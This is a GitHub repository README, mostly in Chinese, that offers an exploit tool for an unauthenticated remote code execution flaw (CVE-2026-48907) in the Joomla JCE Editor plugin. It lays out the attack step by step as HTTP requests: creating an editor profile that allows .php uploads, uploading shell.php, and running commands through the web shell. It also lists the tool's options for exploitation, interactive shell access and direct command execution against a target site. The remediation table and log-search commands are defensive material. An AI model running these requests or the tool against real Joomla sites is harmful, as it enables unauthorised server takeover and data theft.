amnsecurity/CVE-2026-48907-Joomla-JCE-RCE
GitHub: amnsecurity/CVE-2026-48907-Joomla-JCE-RCE
该工具针对 Joomla JCE Editor 插件的未授权远程代码执行漏洞(CVE-2026-48907)提供了 PoC 验证与深入的技术分析。
Stars: 1 | Forks: 0
# ─── CVE-2026-48907 ───
# 🏴 AMN SECURITY 🏴 ### 网络安全研究中心 | Cyber Security Research Center [](https://amn.amnoffsec.workers.dev/) [](https://www.instagram.com/ixctw) [](mailto:ayman.mahmoudoffsec@gmail.com)
# 🏴 AMN SECURITY 🏴 ### 网络安全研究中心 | Cyber Security Research Center [](https://amn.amnoffsec.workers.dev/) [](https://www.instagram.com/ixctw) [](mailto:ayman.mahmoudoffsec@gmail.com)
# ⚠️ Joomla JCE Editor 插件远程代码执行漏洞
### CVE-2026-48907 | CVSS 9.8 | 严重 (CRITICAL)
### 📋 执行摘要
**Joomla** 内容管理系统(CMS)的 **JCE Editor**(JCE — Joomla Content Editor)插件中存在一个非常严重的安全漏洞,允许未经身份验证的攻击者(无需登录)创建新的编辑器配置文件,最终导致在目标服务器上传并执行恶意 PHP 代码。
该漏洞的评级为 **CVSS 9.8 (Critical)**,允许在无需任何事先权限的情况下完全接管 Joomla 网站。该漏洞已在 **Joomla 5.1.6** 和 **Joomla 4.4.11** 版本中修复。
| 项目 | 详情 |
|--------|----------|
| **CVE** | CVE-2026-48907 |
| **CVSS v3.1** | 9.8 (Critical) |
| **向量** | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| **类型** | Unauthenticated Remote Code Execution |
| **产品** | Joomla! CMS (JCE Editor 插件) |
| **受影响版本** | Joomla 4.x < 4.4.11, Joomla 5.x < 5.1.6 |
| **修复版本** | Joomla 4.4.11 / Joomla 5.1.6 |
| **利用链** | JCE Editor → 创建配置文件 → 上传 PHP |
| **影响** | 完全接管服务器 |
### 🔍 漏洞详情
该漏洞利用了 JCE 插件中的编辑器配置文件创建机制。该插件允许用户创建新的配置文件,但由于没有进行适当的权限检查,甚至未注册的用户也可以创建自定义配置文件。
核心问题是这些配置文件允许指定**允许上传的文件扩展名**和**文件上传**设置。攻击者可以利用这一点上传恶意 PHP 文件。
#### 漏洞利用流程
```
[مهاجم غير مُصادق]
│
▼
1. إنشاء ملف تعريف محرر جديد (Editor Profile) عبر API
│
▼
2. تعديل إعدادات رفع الملفات في ملف التعريف
• إضافة امتداد .php إلى قائمة الامتدادات المسموح بها
│
▼
3. رفع ملف PHP ضار (Web Shell) عبر المحرر
│
▼
4. الوصول إلى Web Shell → تنفيذ أوامر عشوائية
│
▼
5. ✅ استيلاء كامل على موقع Joomla والخادم
```
#### 受影响的组件
| 组件 | 功能 |
|--------|---------|
| **JCE Editor Plugin** | Joomla 的高级编辑器插件 |
| **Editor Profile Manager** | 编辑器配置文件管理器 |
| **File Upload Handler** | 编辑器中的文件上传处理器 |
| **Media Manager** | Joomla 的媒体管理器 |
### ⚙️ 漏洞利用机制详解
#### 步骤 1:创建恶意编辑器配置文件
攻击者向创建编辑器配置文件的 endpoint 发送 HTTP 请求。由于没有身份验证,配置文件被成功创建。
```
POST /index.php?option=com_jce&task=profile.save HTTP/1.1
Host: target-joomla.com
Content-Type: application/x-www-form-urlencoded
name=MaliciousProfile
&type=user
&plugins[upload][allowed]=jpg,png,gif,php
&plugins[upload][maxsize]=10000000
```
#### 步骤 2:上传 Web Shell
创建配置文件后,攻击者可以利用它上传恶意 PHP 文件:
```
POST /index.php?option=com_jce&task=upload&profile=MaliciousProfile HTTP/1.1
Host: target-joomla.com
Content-Type: multipart/form-data
--boundary
Content-Disposition: form-data; name="file"; filename="shell.php"
--boundary--
```
#### 步骤 3:执行命令
```
GET /media/com_jce/shell.php?cmd=id HTTP/1.1
Host: target-joomla.com
→ uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
### 🖥️ 工具使用
```
# 目标扫描
python3 CVE-2026-48907.py -t https://target-joomla.com --check
# 利用 Web Shell 上传进行完整利用
python3 CVE-2026-48907.py -t https://target-joomla.com --exploit -o shell.php
# 交互式 shell 模式
python3 CVE-2026-48907.py -t https://target-joomla.com --interactive
# 通过代理
python3 CVE-2026-48907.py -t https://target-joomla.com --proxy http://127.0.0.1:8080
# 直接命令执行
python3 CVE-2026-48907.py -t https://target-joomla.com -c "whoami && id"
```
#### 可用选项
| 选项 | 描述 |
|--------|-------|
| `-t, --target` | 目标 Joomla 网站的 URL |
| `--check` | 仅检查漏洞是否存在 |
| `--exploit` | 利用漏洞并上传 Web Shell |
| `-o, --output` | 输出的 Web Shell 文件名 |
| `--interactive` | 交互式 shell 模式 |
| `-c, --command` | 直接执行命令 |
| `--proxy` | 用于调试的 HTTP 代理 |
| `--profile-name` | 配置文件名称(可选) |
| `--verbose, -v` | 显示详细输出 |
### 🛡️ 修复措施
| 措施 | 优先级 | 描述 |
|---------|----------|-------|
| **更新 Joomla** | 🟢 立即 | 将 Joomla 更新至 5.1.6 或 4.4.11 |
| **禁用 JCE Editor** | 🟢 暂时 | 在更新之前禁用该插件 |
| **审计配置文件** | 🟡 重要 | 审查并删除任何未经授权的配置文件 |
| **扫描上传的文件** | 🟡 重要 | 在 media/com_jce/ 中搜索恶意 PHP 文件 |
| **审查日志** | 🔵 持续 | 审查服务器日志以寻找可疑活动 |
#### 快速检查命令
```
# 搜索 web shell
find /var/www/html -name "*.php" -newer /var/www/html/configuration.php
# 扫描日志
grep -r "com_jce" /var/log/apache2/access.log | grep -i "shell\|cmd\|system"
# 检查版本
grep -r "JCE" /var/www/html/administrator/manifests/files/joomla.xml
```
### 📊 影响评估
| 领域 | 影响 |
|--------|---------|
| **机密性** | 🔴 完全破坏 — 可以读取所有数据 |
| **完整性** | 🔴 完全破坏 — 可以修改所有数据 |
| **可用性** | 🔴 完全破坏 — 可以使网站瘫痪 |
| **利用难度** | 🟢 低 — 不需要权限或高级知识 |
| **攻击检测** | 🟡 中等 — 可以在日志中检测到 |
### 🔗 参考链接
- **NVD**: https://nvd.nist.gov/vuln/detail/CVE-2026-48907
- **Joomla Release**: https://www.joomla.org/announcements/release-news/5894-joomla-5-1-6-and-joomla-4-4-11-security-fixes.html
- **JCE Editor**: https://www.joomlacontenteditor.net/
- **CWE-94**: Improper Control of Generation of Code (Code Injection)
### 🔗 联系 AMN SECURITY
[](https://amn.amnoffsec.workers.dev/)
[](https://www.instagram.com/ixctw)
[](mailto:ayman.mahmoudoffsec@gmail.com)
# ⚠️ CVE-2026-48907 — Joomla JCE Editor 未授权远程代码执行 ### CVSS 9.8 | 严重 | 远程代码执行 ### 执行摘要 **CVE-2026-48907** 是 **Joomla CMS** 的 **JCE Editor** 插件中存在的一个严重的未授权远程代码执行 (RCE) 漏洞。此漏洞允许没有任何身份验证的攻击者创建新的编辑器配置文件,并最终在目标服务器上传和执行任意 PHP 代码。 该漏洞的 **CVSS 评分为 9.8 (严重)**,允许完全接管 Joomla 网站。该漏洞已在 **Joomla 5.1.6** 和 **Joomla 4.4.11** 中修复。 | 字段 | 值 | |-------|-------| | **CVE** | CVE-2026-48907 | | **CVSS v3.1** | 9.8 (Critical) | | **向量** | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | | **类型** | 未授权远程代码执行 | | **产品** | Joomla CMS (JCE Editor 插件) | | **受影响版本** | Joomla 4.x < 4.4.11, Joomla 5.x < 5.1.6 | | **修复版本** | Joomla 4.4.11 / Joomla 5.1.6 | | **影响** | 完全接管服务器 | ### 漏洞详情 该漏洞存在于 **JCE Editor 的配置文件创建功能**中。该插件暴露了一个 API endpoint,允许在没有适当身份验证检查的情况下创建编辑器配置文件。攻击者可以: 1. **创建具有文件上传权限的恶意编辑器配置文件** 2. **将 PHP 扩展名添加**到允许上传的列表中 3. **通过编辑器的文件上传处理器上传 PHP web shell** 4. **在目标服务器上执行任意命令** #### 漏洞利用流程 ``` [Unauthenticated Attacker] │ ▼ 1. Create Editor Profile via JCE API │ ▼ 2. Modify upload settings to allow .php files │ ▼ 3. Upload malicious PHP web shell │ ▼ 4. Access shell → execute OS commands │ ▼ 5. ✅ Full Joomla site compromise ``` ### 工具使用 ``` # 检查漏洞 python3 CVE-2026-48907.py -t https://target-joomla.com --check # 利用 Web Shell 上传进行完整利用 python3 CVE-2026-48907.py -t https://target-joomla.com --exploit -o shell.php # 交互式 shell 模式 python3 CVE-2026-48907.py -t https://target-joomla.com --interactive # 通过代理 python3 CVE-2026-48907.py -t https://target-joomla.com --proxy http://127.0.0.1:8080 # 直接命令执行 python3 CVE-2026-48907.py -t https://target-joomla.com -c "whoami && id" ``` ### 修复措施 | 措施 | 优先级 | 描述 | |--------|----------|-------------| | **更新 Joomla** | 🔴 立即 | 更新至 Joomla 5.1.6 或 4.4.11 | | **禁用 JCE Editor** | 🔴 临时 | 在修复之前禁用该插件 | | **审计配置文件** | 🟡 重要 | 审查并删除未经授权的配置文件 | | **扫描上传文件** | 🟡 重要 | 检查恶意 PHP 文件 | ### 影响评估 | 领域 | 影响 | |--------|--------| | **机密性** | 🔴 完全破坏 — 所有数据均可读取 | | **完整性** | 🔴 完全破坏 — 所有数据均可修改 | | **可用性** | 🔴 完全破坏 — 网站可被下线 | | **利用复杂性** | 🟢 低 — 无需身份验证或特殊知识 | ### 参考链接 - **NVD**: https://nvd.nist.gov/vuln/detail/CVE-2026-48907 - **Joomla Announcement**: https://www.joomla.org/announcements/release-news/5894-joomla-5-1-6-and-joomla-4-4-11-security-fixes.html - **CWE-94**: 代码生成控制不当 ### 联系 AMN SECURITY 🌐 **网站**: https://amn.amnoffsec.workers.dev/ 📸 **Instagram**: https://www.instagram.com/ixctw 📧 **邮箱**: ayman.mahmoudoffsec@gmail.com
标签:CISA项目, Joomla, OpenVAS, PHP, PoC, Web安全, 安全漏洞, 暴力破解, 编程工具, 蓝队分析, 远程代码执行, 逆向工具